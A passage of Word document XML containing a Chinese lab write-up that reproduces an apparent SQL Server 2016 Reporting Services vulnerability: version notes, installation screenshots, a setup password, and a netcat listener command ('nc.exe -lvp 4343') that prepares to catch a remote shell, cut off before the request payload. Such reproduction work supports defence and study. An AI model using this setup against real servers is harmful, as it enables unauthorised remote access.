        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A"/>
    <w:p w:rsidR="00492C9D" w:rsidRDefault="00456C53" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="0004080A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年起发行的版本有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2005</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2008 R2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql server 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正式发行有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enterprise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>express</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>express</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版免费</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>express</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版功能相对少一些，适合初学者</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enterprise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版全部功能，但不能部署到生产环境中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去官网已经很难找到下载的地方了（至少我没找到），通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msdn itellyou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个网站来下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载时要注意，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msdn itellyou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个版本，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指的是“社区技术预览版”，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指的是“发布候选版”，我这里选择“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL Server 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="0004080A" w:rsidP="0004080A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL Server 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”又包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enterprise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enterprise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版安装时发现会自动使用一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天试用的密钥，为了不给以后添麻烦，重新下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004080A" w:rsidRDefault="0004080A" w:rsidP="00A8135D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="00AB2E6B" w:rsidP="00A8135D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0x04</w:t>
      </w:r>
      <w:r w:rsidR="009252BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="00C952BD" w:rsidP="00A8135D">
      <w:r>
        <w:t>SQL Server 2016 Developer Edition x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程</w:t>
      </w:r>
      <w:r w:rsidR="009F0C7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中需要额外注意的步骤已用红色圈出，其他步骤下一步即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D"/>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D">
      <w:r w:rsidRPr="009F0C7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="696CA7A8" wp14:editId="2053B85E">
            <wp:extent cx="5274310" cy="3817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17620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D"/>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D">
      <w:r w:rsidRPr="009F0C7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2321E424" wp14:editId="53DFF2F7">
            <wp:extent cx="5274310" cy="4061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61460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74B36" w:rsidRDefault="00C74B36" w:rsidP="00A8135D"/>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D">
      <w:r w:rsidRPr="009F0C7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="199C3987" wp14:editId="6034E574">
            <wp:extent cx="5274310" cy="40278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27805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74B36" w:rsidRDefault="00C74B36" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00C74B36" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D">
      <w:r w:rsidRPr="009F0C7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51A96604" wp14:editId="36871E16">
            <wp:extent cx="5274310" cy="3988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88435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D"/>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D">
      <w:r w:rsidRPr="009F0C7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A44B62C" wp14:editId="57CE0E68">
            <wp:extent cx="5274310" cy="39960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6055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D"/>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D">
      <w:r w:rsidRPr="009F0C7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7622D08D" wp14:editId="00D00BE3">
            <wp:extent cx="5274310" cy="39763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76370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74B36" w:rsidRDefault="00C74B36" w:rsidP="00A8135D"/>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D">
      <w:r w:rsidRPr="009F0C7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A468218" wp14:editId="63991DED">
            <wp:extent cx="5274310" cy="39801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80180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D"/>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D">
      <w:r w:rsidRPr="001D0A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C919B68" wp14:editId="2FFD35B0">
            <wp:extent cx="5274310" cy="3977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77640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0C7D" w:rsidRDefault="009F0C7D" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00667580" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D">
      <w:r w:rsidRPr="001D0A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4ADF2A" wp14:editId="3803B057">
            <wp:extent cx="5274310" cy="39789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8910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667580" w:rsidRDefault="00667580" w:rsidP="00A8135D"/>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D">
      <w:r w:rsidRPr="001D0A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31BDCA14" wp14:editId="7749D3F3">
            <wp:extent cx="5274310" cy="3724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4275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00245775" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D">
      <w:r w:rsidRPr="001D0A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75477780" wp14:editId="3360BDAD">
            <wp:extent cx="5274310" cy="3778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78250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="00CE4C0F" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4C0F">
        <w:t>123qweASD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE4C0F" w:rsidRDefault="00CE4C0F" w:rsidP="00A8135D"/>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D">
      <w:r w:rsidRPr="001D0A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="691316B4" wp14:editId="7894703D">
            <wp:extent cx="5274310" cy="37668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6820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D"/>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D">
      <w:r w:rsidRPr="001D0A0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B3738D" wp14:editId="0541EF18">
            <wp:extent cx="5274310" cy="37579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57930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0A0B" w:rsidRDefault="001D0A0B" w:rsidP="00A8135D"/>
    <w:p w:rsidR="007D7CF1" w:rsidRDefault="007D7CF1" w:rsidP="00A8135D">
      <w:r w:rsidRPr="007D7CF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3561D1A9" wp14:editId="191F0333">
            <wp:extent cx="5274310" cy="37560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56025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C952BD" w:rsidRDefault="00C952BD" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装并配置完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>reporting services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，启动“</w:t>
      </w:r>
      <w:r w:rsidRPr="00245775">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting Services </w:t>
      </w:r>
      <w:r w:rsidRPr="00245775">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置管理器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00245775">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BAF215C" wp14:editId="753D4856">
            <wp:extent cx="5274310" cy="32550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5010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击“连接”进入配置管理器，如下图表示成功启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00245775">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E778890" wp14:editId="0B6F5486">
            <wp:extent cx="5274310" cy="36614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1410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行命令“</w:t>
      </w:r>
      <w:r w:rsidRPr="00245775">
        <w:t>nc.exe -lvp 4343</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听在端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4343</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00245775">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2047A2" wp14:editId="5F474AA5">
            <wp:extent cx="5274310" cy="8864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86460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245775" w:rsidRDefault="00245775" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00063634" w:rsidRDefault="00245775" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装并启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00063634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送方式</w:t>
      </w:r>
      <w:r w:rsidR="00063634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00063634">
        <w:t>OST</w:t>
      </w:r>
      <w:r w:rsidR="00063634">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00063634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
